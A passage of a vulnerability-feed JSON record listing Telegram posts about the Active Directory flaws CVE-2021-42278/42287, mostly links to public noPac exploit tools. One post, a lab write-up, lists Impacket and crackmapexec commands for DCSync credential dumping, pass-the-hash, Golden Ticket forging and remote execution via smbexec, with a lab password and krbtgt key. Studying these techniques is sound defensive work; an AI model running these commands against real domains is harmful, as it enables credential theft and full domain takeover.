\u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u0443\u0435\u043c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u043e\u0431\u0440\u0430\u0442\u043d\u043e (\u043d\u0435\u0432\u0430\u0436\u043d\u043e, \u0432 \u043a\u0430\u043a\u043e\u0435 \u0438\u043c\u044f) \u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u044d\u0442\u043e\u0433\u043e TGT \u0437\u0430\u043f\u0440\u043e\u0441\u0438\u043c TGS \u043d\u0430 \u043a\u0430\u043a\u0443\u044e-\u043b\u0438\u0431\u043e \u0441\u043b\u0443\u0436\u0431\u0443 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, LDAP) \u044d\u0442\u043e\u0433\u043e, \u043d\u044b\u043d\u0435 \u0443\u0436\u0435 \u043d\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e, \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430? \u041d\u0435\u0443\u0436\u0435\u043b\u0438 \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0431\u0438\u043b\u0435\u0442, \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u043e\u043c \u0434\u043e\u043c\u0435\u043d\u0430, \u043d\u0430 \u0441\u0430\u043c\u043e\u0433\u043e \u0441\u0435\u0431\u044f? \u0414\u0430 \u043d\u0435, \u0431\u0440\u0435\u0434, \u0431\u044b\u0442\u044c \u0442\u0430\u043a\u043e\u0433\u043e \u043d\u0435 \u043c\u043e\u0436\u0435\u0442... \u0412\u0435\u0434\u044c \u0442\u0430\u043a?\n\n\u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u0441\u0442\u0430\u0442\u044c\u044e.\n\nLH | \u041d\u043e\u0432\u043e\u0441\u0442\u0438 | OSINT | \u041a\u0443\u0440\u0441\u044b", "creation_timestamp": "2024-11-20T13:25:03.000000Z"}, {"uuid": "21f82db3-6332-488e-b918-e3af76a752d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1460", "content": "#Red_Team\n\nExploiting CVE-2021-42278/CVE-2021-42287 to impersonate DA from standard domain user\nhttps://github.com/WazeHell/sam-the-admin\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T04:30:01.000000Z"}, {"uuid": "7e374c3b-001e-4322-9cfa-88efcd2c7795", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1502", "content": "#CVE-2021\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user \n\nhttps://github.com/WazeHell/sam-the-admin\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T16:59:21.000000Z"}, {"uuid": "743dd184-5d74-46cb-b69c-21593dda0902", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1394", "content": "#CVE-2021\nExploiting CVE-2021-42278 and CVE-2021-42287\n\nhttps://github.com/waterrr/noPac\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T20:05:03.000000Z"}, {"uuid": "0f553b26-9cb9-472a-9a53-593040104212", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/haccking/7058", "content": "#\u041e\u0431\u0443\u0447\u0435\u043d\u0438\u0435\n\u041e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0434\u043e\u043c\u0435\u043d\u0430 \u0434\u043e \u043f\u0440\u0430\u0432 \u0430\u0434\u043c\u0438\u043d\u0430: CVE-2021-42278, CVE-2021-42287", "creation_timestamp": "2022-01-22T10:49:05.000000Z"}, {"uuid": "b677ef0e-5dd1-4661-922e-250aa7f49e5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1382", "content": "#CVE-2021\n\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user \n\nhttps://github.com/Ridter/noPac\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T14:51:41.000000Z"}, {"uuid": "a8d0d7c2-dada-4a00-ae1f-71e7a8be1837", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4979", "content": "#Red_Team_Tactics\nExploiting CVE-2021-42278/CVE-2021-42287 to impersonate DA from standard domain user\nhttps://github.com/WazeHell/sam-the-admin\n]-> Python implementation for CVE-2021-42278\n(AD Privilege Escalation)\nhttps://github.com/ly4k/Pachine", "creation_timestamp": "2021-12-15T12:29:46.000000Z"}, {"uuid": "39d8449f-f9dd-4c3e-b8c4-899cd3664214", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/S_E_Reborn/4649", "content": "\ud83c\udfab\u041d\u0435\u043c\u043d\u043e\u0433\u043e \u043e Golden Ticket\ud83c\udfab\n\n\u0418\u0437\u0443\u0447\u0430\u044f \u0440\u0435\u0441\u0443\u0440\u0441\u044b \u043f\u043e \u0442\u0438\u043f\u0443 HackTricks, \u0432\u044b \u043c\u043e\u0433\u043b\u0438 \u043d\u0435\u043e\u0434\u043d\u043e\u043a\u0440\u0430\u0442\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u0441\u043f\u043e\u0441\u043e\u0431 \u0432\u044b\u0434\u0430\u0447\u0438 \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0437\u043e\u043b\u043e\u0442\u043e\u0433\u043e \u0431\u0438\u043b\u0435\u0442\u0430 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 ticketer.py \u0438\u0437 \u043d\u0430\u0431\u043e\u0440\u0430 Impacket\ud83d\udc69\u200d\ud83d\udcbb:\npython3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser\n\n\u041d\u043e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0432 \u0441\u0435\u0431\u0435 \u0431\u0438\u043b\u0435\u0442 \u0442\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u043f\u0440\u0438 \u043f\u043e\u043f\u044b\u0442\u043a\u0435 \u0435\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u044b \u0443\u0432\u0438\u0434\u0438\u0442\u0435 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043e\u0448\u0438\u0431\u043a\u0443:\n[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)\n\u041e \u0447\u0435\u043c \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u044d\u0442\u0430 \u043e\u0448\u0438\u0431\u043a\u0430? \u0411\u0438\u043b\u0435\u0442 \u0431\u044b\u043b \u043e\u0442\u043e\u0437\u0432\u0430\u043d? \u041d\u043e \u043c\u044b \u0436\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0442\u043e \u0435\u0433\u043e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438!\n\n\u0412\u0441\u044f \u043f\u0440\u0438\u0447\u0438\u043d\u0430 \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043a\u0442\u043e-\u0442\u043e \u043d\u0435 \u0441\u043b\u0435\u0434\u0438\u0442 \u0437\u0430 \u043f\u0430\u0442\u0447-\u043d\u043e\u0443\u0442\u0430\u043c\u0438. \u0421 \u043d\u043e\u044f\u0431\u0440\u044f 2021 \u0433\u043e\u0434\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Microsoft \u043d\u0430\u0447\u0430\u043b\u0430 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 KB5008380, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0432\u043e\u0434\u0438\u043b\u043e\u0441\u044c \u0432 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u044d\u0442\u0430\u043f\u043e\u0432. \u0415\u0433\u043e \u0446\u0435\u043b\u044c\u044e \u0431\u044b\u043b\u0430 \u043d\u0435\u0439\u0442\u0440\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-42287, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0430 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0431\u0435\u0437 \u043e\u0441\u043e\u0431\u044b\u0445 \u0443\u0441\u0438\u043b\u0438\u0439 \u043e\u043b\u0438\u0446\u0435\u0442\u0432\u043e\u0440\u044f\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430, \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u044f\u044f Privilege Attribute Certificate (PAC) Kerberos\ud83d\uddbc\ufe0f\n\n\u0414\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u043d\u0435 \u0432 \u0442\u0435\u043c\u0435:\nPrivilege Attribute Certificate (PAC) \u2014 \u044d\u0442\u043e \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u0432 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 Kerberos, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0445\u0440\u0430\u043d\u0438\u0442 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u0431 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u043f\u0440\u0438\u043a\u0440\u0435\u043f\u043b\u044f\u0435\u0442\u0441\u044f \u043a \u0431\u0438\u043b\u0435\u0442\u0443 Kerberos, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0447\u043b\u0435\u043d\u0441\u0442\u0432\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0433\u0440\u0443\u043f\u043f\u0430\u0445, \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u0445 \u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0430\u0445, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e.\n\n\u0412\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u044f\u0441\u044c \u043a \u043f\u0430\u0442\u0447\u0443, Microsoft \u043e\u0431\u043d\u043e\u0432\u0438\u043b\u0430 PAC, \u0434\u043e\u0431\u0430\u0432\u0438\u0432 \u0434\u0432\u0435 \u043d\u043e\u0432\u044b\u0435 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0434\u0430\u043d\u043d\u044b\u0445: PAC_ATTRIBUTES_INFO \u0438 PAC_REQUESTOR. \u041d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u0447\u0430\u0441\u0442\u044c\u044e \u043f\u0430\u0442\u0447\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u043e\u0439 PAC_REQUESTOR. \u0421 \u0435\u0451 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0435\u043c KDC \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f (\u043a\u043b\u0438\u0435\u043d\u0442\u0430) \u0432 \u0431\u0438\u043b\u0435\u0442\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0437\u0440\u0435\u0448\u0430\u0435\u0442\u0441\u044f \u0432 SID, \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0439 \u0432 PAC. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0441 \u043e\u043a\u0442\u044f\u0431\u0440\u044f 2022 \u0433\u043e\u0434\u0430 \u043b\u044e\u0431\u043e\u0439 \u0431\u0438\u043b\u0435\u0442 \u0431\u0435\u0437 \u043d\u043e\u0432\u043e\u0439 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b PAC (\u0438\u043b\u0438 \u0431\u0438\u043b\u0435\u0442 \u0434\u043b\u044f \u043d\u0435\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f) \u0431\u0443\u0434\u0435\u0442 \u043e\u0442\u043a\u043b\u043e\u043d\u0435\u043d. \u0415\u0441\u0442\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u0435\u0441\u043b\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e.\n\u0412 \u044d\u0442\u043e\u043c \u0438 \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0441\u0443\u0442\u044c \u043e\u0448\u0438\u0431\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u044b \u043c\u043e\u0433\u043b\u0438 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0442\u044c \u0432\u044b\u0448\u0435.\n\n\u0412\u043c\u0435\u0441\u0442\u0435 \u0441 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043f\u043e\u0434\u0445\u043e\u0434 \u043a \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044e \u0437\u043e\u043b\u043e\u0442\u044b\u0445 \u0431\u0438\u043b\u0435\u0442\u043e\u0432 \u0442\u043e\u0436\u0435 \u0438\u0437\u043c\u0435\u043d\u0438\u043b\u0441\u044f. \u041c\u044b \u043d\u0435 \u043c\u043e\u0436\u0435\u043c \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c Golden Ticket \u0434\u043b\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u043d\u043e \u043c\u043e\u0436\u0435\u043c \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u043c!\n\u0414\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u0435 Impacket!\napt install python3-impacket\n\u041f\u043e\u0441\u043b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0437\u043e\u043b\u043e\u0442\u043e\u0439 \u0431\u0438\u043b\u0435\u0442 \u043c\u043e\u0436\u043d\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439:\npython3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN -user-id 1000 validuser\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043e\u0431\u0440\u0430\u0442\u043d\u0430\u044f \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u043e \u0441\u0442\u0430\u0440\u044b\u043c PAC \u0442\u0430\u043a \u0436\u0435 \u043e\u0441\u0442\u0430\u043d\u0435\u0442\u0441\u044f:\npython3 ticketer.py -nthash $krbtgtRC4key -domain-sid $domainSID -domain $DOMAIN -old-pac username\n\n\u041f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u0440\u0438\u043c\u0435\u0440 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f Golden Ticket \u043d\u0430 \u043f\u0440\u0438\u043c\u0435\u0440\u0435 \u0443\u0436\u0435 \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u043d\u043d\u043e\u0439 \u043c\u043d\u043e\u0439 \u043b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u043d\u043e\u0439 Kingdom \u0441 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Codeby.Games:\n# \u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c SID \u0434\u043e\u043c\u0435\u043d\u0430:\nimpacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4\n\n# \u0414\u0435\u043b\u0430\u0435\u043c DCSync, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043a\u043b\u044e\u0447\u0438 \u0443\u0447\u0435\u0442\u043a\u0438 krbtgt:\nimpacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt\n\n# \u041e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u043c RID-\u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0430\u0440 RID+user (\u0442\u0443\u0442 \u044f \u0432\u043d\u0435\u0437\u0430\u043f\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b Pass-the-Hash):\ncrackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute\n\n# \u0412\u044b\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u0437\u043e\u043b\u043e\u0442\u043e\u0439 \u0431\u0438\u043b\u0435\u0442:\nimpacket-ticketer -aesKey\nc8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova\n\n# \u0414\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u043c \u0437\u0430\u043f\u0438\u0441\u044c \u0432 /etc/hosts, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e Kerberos \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 \u0438\u043c\u0435\u043d\u0430\u043c\u0438 \u0441\u043b\u0443\u0436\u0431:\necho '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' >> /etc/hosts\n\n# \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c smbexec \u0441 \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u043c \u0437\u043e\u043b\u043e\u0442\u044b\u043c \u0431\u0438\u043b\u0435\u0442\u043e\u043c:\nexport KRB5CCNAME=amaslova.ccache\nimpacket-smbexec codeby.cdb/amaslova@kingdom.codeby.cdb -k -no-pass\n\n\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u043d\u0430 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0445 \u043a \u043f\u043e\u0441\u0442\u0443 (\u043d\u0438\u0436\u0435) \u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442\u0430\u0445. \u041d\u0430 \u043f\u0435\u0440\u0432\u043e\u043c \u0438\u0437 \u043d\u0438\u0445 \u0432\u0438\u0434\u043d\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0430 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0431\u0438\u043b\u0435\u0442 \u043d\u0430 \u043d\u0435\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0430 \u043d\u0430 \u0432\u0442\u043e\u0440\u043e\u043c \u2014 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0437\u043e\u043b\u043e\u0442\u043e\u0433\u043e \u0431\u0438\u043b\u0435\u0442\u0430, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043b\u044f \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 amaslova!", "creation_timestamp": "2024-04-04T16:56:15.000000Z"}, {"uuid": "10b9d8a7-81a2-477e-b19f-ab1f8626211a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/5115", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (Dec 1-31)\nCVE-2021-44228 - Apache Log4j2\nCVE-2021-45046 - Apache Log4j DoS\nCVE-2021-42278, CVE-2021-42287 - AD Domain Services EoP Vulnerability\nCVE-2021-44832 - Apache Log4j 2.17.0\nCVE-2021-45105 - DoS via Uncontrolled Recursion in Log4j Strsubstitutor\nCVE-2021-43798 - Grafana 8.x Path Traversal\nCVE-2021-44077 - PreAuth RCE in ManageEngine ServiceDesk Plus\nCVE-2021-4422 - Log4j vulnerability\nCVE-2021-44515 - Zoho ManageEngine Desktop Central Pre-auth RCE", "creation_timestamp": "2024-10-21T16:08:53.000000Z"}, {"uuid": "5304903f-ed68-4eb0-91b0-fb919f711195", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/4950", "content": "#Threat_Research\n1. The Python Vulnerability Landscape:\nAnalysis of 10yrs of vulnerability data\nhttps://medium.com/geekculture/the-python-vulnerability-landscape-3904494eec67\n2. CVE-2021-42287/CVE-2021-42278:\nWeaponisation - Active Directory\nhttps://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n]-> https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing", "creation_timestamp": "2022-07-06T21:36:38.000000Z"}, {"uuid": "c62f5aaa-ac0a-4ea2-8285-da59ba2380c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4957", "content": "#tools\n#Offensive_security\n1. JNDI Exploit Kit\nhttps://github.com/pimps/JNDI-Exploit-Kit\n2. CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter\nhttps://github.com/cube0x0/noPac\n// If a Domain Controller is vulnerable it will return a TGT without a PAC, all eyes on small size tickets", "creation_timestamp": "2021-12-12T17:52:26.000000Z"}, {"uuid": "bf792e24-758c-4a88-bfed-4396a2fbc8a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "Telegram/fO-UeyZKTtHCwNeV96AKSNSdqyEhxnaa_KQJZWWdPcKrF9o", "content": "", "creation_timestamp": "2023-03-14T17:04:16.000000Z"}, {"uuid": "96c1ea6f-ec49-47e0-9877-0f54292fce51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/win_def/61", "content": "Exploiting CVE-2021-42287/CVE-2021-42278 (Linux)\n\nhttps://github.com/WazeHell/sam-the-admin\n\n#ad #pac #s4u2self #windows #redteam", "creation_timestamp": "2021-12-12T20:40:44.000000Z"}]}